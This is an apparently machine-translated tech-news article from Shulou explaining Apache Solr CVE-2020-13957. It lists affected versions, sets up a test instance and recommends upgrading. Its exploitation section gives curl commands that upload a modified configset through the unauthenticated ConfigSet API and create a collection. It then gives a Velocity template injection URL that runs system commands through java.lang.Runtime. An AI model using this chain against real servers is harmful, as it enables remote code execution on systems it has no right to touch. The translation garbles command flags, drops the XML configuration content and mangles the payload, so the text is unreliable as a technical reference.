Shulou(Shulou.com)05/31 Report--

This article shows you how to understand the Apache Solr unauthorized upload vulnerability CVE-2020-13957, which is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Introduction to 0x00

Solr is an open source enterprise search server, and the underlying layer is implemented using Java that is easy to extend and modify. Server communication uses standard HTTP and XML, so it is useful but not necessary to understand Java technology using Solr.

The main features of Solr are: powerful full-text retrieval function, highlighting search results, dynamic cluster, database interface and electronic document (Word, PDF, etc.) processing. And Solr is highly extensible, supporting replication of distributed searches and indexes.

Overview of 0x01 vulnerabilities

Apache Solr issued an announcement that there is a risk of unauthorized upload vulnerabilities in older versions of ConfigSet API, which could lead to RCE (remote code execution).

0x02 affects version

Apache Solr 6.6.0-6.6.5

Apache Solr 7.0.0-7.7.3

Apache Solr 8.0.0-8.6.2

0x03 environment building

1. The test environment is downloaded from solr7.0.1 at the following address:

Https://archive.apache.org/dist/lucene/solr/7.0.1/

two。 Enter the solr-7.7.0/bin directory and use. / solr start-e cloud-force to launch a cloud example, which can be installed by default.

. / solr start-e cloud-force

Display to this step indicates that the installation is complete

Enter http://127.0.0.1:8983/ in the browser

0x04 vulnerability exploitation

Go to the / solr-7.0.1/server/solr/configsets/sample_techproducts_configs/conf directory.

Next modify solrconfig.xml as follows: enter wq or x to save

Original configuration content:

${velocity.template.base.dir:}

After modification:

${velocity.template.base.dir:}

${velocity.solr.resource.loader.enabled:true}

${velocity.params.resource.loader.enabled:true}

3. Then execute zip-r-* > mytest.zip

4. Then execute curl-X POST-- header "Content-Type:application/octet-stream"-- data-binary @ mytest.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mytest""

5. Then execute the curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=mytest2&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest""

6. Here you can see that a Collection named mytest2 has been uploaded. You can now use the vulnerability to execute RCE.

Http://ip:8983/solr/mytest2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor() +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($str.valueOf + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end

0x05 repair recommendation

Upgrade solr to the latest version

The above content is Apache Solr unauthorized upload vulnerability CVE-2020-13957 how to understand, have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.